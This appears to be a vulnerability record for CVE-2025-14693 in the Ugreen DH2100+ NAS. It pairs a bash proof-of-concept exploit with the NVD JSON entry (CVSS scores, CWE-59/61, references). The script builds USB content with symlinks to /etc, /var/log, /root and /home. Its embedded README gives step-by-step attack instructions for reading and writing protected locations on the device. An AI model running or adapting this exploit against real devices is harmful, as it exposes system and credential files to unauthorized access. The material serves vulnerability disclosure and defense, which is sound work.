CVE-2025-14693

#!/bin/bash # CVE-2025-14693 PoC - Ugreen DH2100+ Symlink Following # Description: Creates a malicious USB with symlink to sensitive directories # Create a directory for the exploit USB content mkdir -p usb_exploit cd usb_exploit # Create symlinks pointing to sensitive system directories echo "Creating malicious symlinks..." ln -sf /etc etc_link ln -sf /var/log var_log_link ln -sf /root root_link ln -sf /home home_link # Create a README file to document the exploit cat > README.txt << 'EOF' CVE-2025-14693 Exploit README Target: Ugreen DH2100+ NAS Vulnerability: Symlink Following in USB Handler This USB device contains symbolic links that point to sensitive system directories on the target NAS device. When connected to the vulnerable Ugreen DH2100+ device, the USB Handler component will follow these symlinks, potentially exposing sensitive system files and configurations. Attack Steps: 1. Connect this USB device to Ugreen DH2100+ 2. Access the NAS web interface or SSH 3. Navigate to USB storage section 4. The system will follow symlinks to sensitive directories 5. Attacker can read/write to protected locations Recommendation: Update to firmware version > 5.3.0 EOF echo "PoC USB device content created successfully" echo "Directory contents:" ls -la cd ..

{"cve": {"id": "CVE-2025-14693", "sourceIdentifier": "[email protected]", "published": "2025-12-15T01:15:37.903", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Ugreen DH2100+ up to 5.3.0. This affects an unknown function of the component USB Handler. Such manipulation leads to symlink following. The attack can be executed directly on the physical device. The exploit has been disclosed to the public and may be used. It is suggested to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.3, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:M/C:C/I:C/A:C", "baseScore": 6.5, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 2.5, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-61"}]}], "references": [{"url": "https://vuldb.com/?ctiid.336411", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336411", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.704646", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.704657", "source": "[email protected]"}, {"url": "https://www.notion.so/2bc6cf4e528a8083bf3fc6f7a953f0a1", "source": "[email protected]"}]}}